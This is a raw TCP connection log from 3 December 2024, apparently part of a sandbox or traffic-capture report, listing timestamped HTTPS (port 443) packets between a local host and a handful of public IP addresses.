                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.510744095 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.515463114 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.515515089 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.524971962 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.525026083 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.528280973 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.528328896 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.533015966 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.533065081 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.534770012 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.534827948 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.541903973 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.541987896 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.545598984 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.545653105 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.548698902 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.548749924 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.548752069 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.548800945 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.548940897 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.548954010 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.551512957 CET49773443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.551542997 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.551604033 CET49773443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.551790953 CET49773443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.551803112 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.818228006 CET49776443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.818253994 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.818322897 CET49776443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.818538904 CET49776443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.818546057 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.606275082 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.606744051 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.606792927 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.607701063 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.607770920 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.608163118 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.608217955 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.608381033 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.608390093 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.651746035 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.845493078 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.845705986 CET49773443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.845717907 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.846004009 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.846277952 CET49773443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.846329927 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.846395969 CET49773443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:58.887336016 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.079560041 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.079837084 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.079870939 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.079906940 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.079916000 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.079945087 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.082370996 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.082577944 CET49776443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.082590103 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.082859993 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.083144903 CET49776443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.083187103 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.083256960 CET49776443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.127326965 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.304662943 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.304716110 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.304760933 CET49773443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.305290937 CET49773443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.305303097 CET44349773104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.537044048 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.537100077 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.537647963 CET49776443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.538016081 CET49776443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.538023949 CET44349776104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.540798903 CET49778443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.540829897 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.541656017 CET49778443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.541853905 CET49778443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.541866064 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.953352928 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.953382015 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.953650951 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.953839064 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:59.953855991 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:00.881630898 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:00.882343054 CET49778443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:00.882359982 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:00.882671118 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:00.882955074 CET49778443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:00.883003950 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:00.883088112 CET49778443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:00.923332930 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.287050009 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.287260056 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.287276983 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.287564993 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.287815094 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.287867069 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.287945032 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.335319042 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.373312950 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.373362064 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.373414040 CET49778443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.373927116 CET49778443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.373935938 CET44349778104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.786612034 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.786693096 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.786731958 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.786748886 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.786761045 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.786806107 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.789738894 CET49781443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:01.789752960 CET44349781104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:02.192353010 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:02.192409992 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:02.192476988 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:02.192830086 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:02.192847013 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.473279953 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.473576069 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.473594904 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.473876953 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.474159956 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.474216938 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.474322081 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.474414110 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.474436998 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.474533081 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:03.474569082 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.098912954 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.098963022 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.099014044 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.099033117 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.100501060 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.100527048 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.100555897 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.100564957 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.100613117 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.100967884 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.107944965 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.107990980 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.107999086 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.151439905 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.151446104 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.197352886 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.219062090 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.273483038 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.273490906 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.290585995 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.290664911 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.290673018 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.296190023 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.296241045 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.296248913 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.304186106 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.304255009 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.304263115 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.311974049 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.312017918 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.312026024 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.319753885 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.319812059 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.320667982 CET49783443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.320677996 CET44349783104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.335872889 CET49784443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.335915089 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.335994959 CET49784443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.336169004 CET49784443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:04.336184025 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:05.648822069 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:05.649064064 CET49784443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:05.649091005 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:05.649393082 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:05.649667978 CET49784443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:05.649729013 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:05.649786949 CET49784443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:05.691343069 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:06.306801081 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:06.306870937 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:06.307578087 CET49784443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:06.307709932 CET49784443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:06.307724953 CET44349784104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:08.417174101 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:08.417223930 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:08.417287111 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:08.417561054 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:08.417577028 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.707197905 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.707457066 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.707490921 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.707781076 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.708070993 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.708127975 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.708208084 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.708287001 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.708321095 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.708447933 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:09.708478928 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.288662910 CET49738443192.168.2.415.197.142.173
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.288775921 CET4434973815.197.142.173192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.288835049 CET49738443192.168.2.415.197.142.173
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.418483973 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.419353008 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.419413090 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.419439077 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.420523882 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.420583010 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.420610905 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.420655966 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.420839071 CET49785443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.420850039 CET44349785104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.424148083 CET49786443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.424192905 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.424257994 CET49786443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.424611092 CET49786443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.424628019 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.877418995 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.877461910 CET44349787104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.877528906 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.877789974 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.877801895 CET44349787104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:11.750674009 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:11.751090050 CET49786443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:11.751130104 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:11.751431942 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:11.751729012 CET49786443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:11.751796961 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:11.751878023 CET49786443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:11.795342922 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.141086102 CET44349787104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.141319036 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.141343117 CET44349787104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142204046 CET44349787104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142272949 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142573118 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142601013 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142632008 CET44349787104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142651081 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142684937 CET49787443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142909050 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.142949104 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.143011093 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.143198967 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.143215895 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.216639996 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.216695070 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.216875076 CET49786443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.217159033 CET49786443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:12.217171907 CET44349786104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.370898962 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.371145010 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.371179104 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.372031927 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.372088909 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.373054981 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.373112917 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.373327971 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.373342991 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:13.413731098 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.518358946 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.518470049 CET44349788104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.518538952 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.519222021 CET49788443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.519243002 CET44349788104.21.3.44192.168.2.4
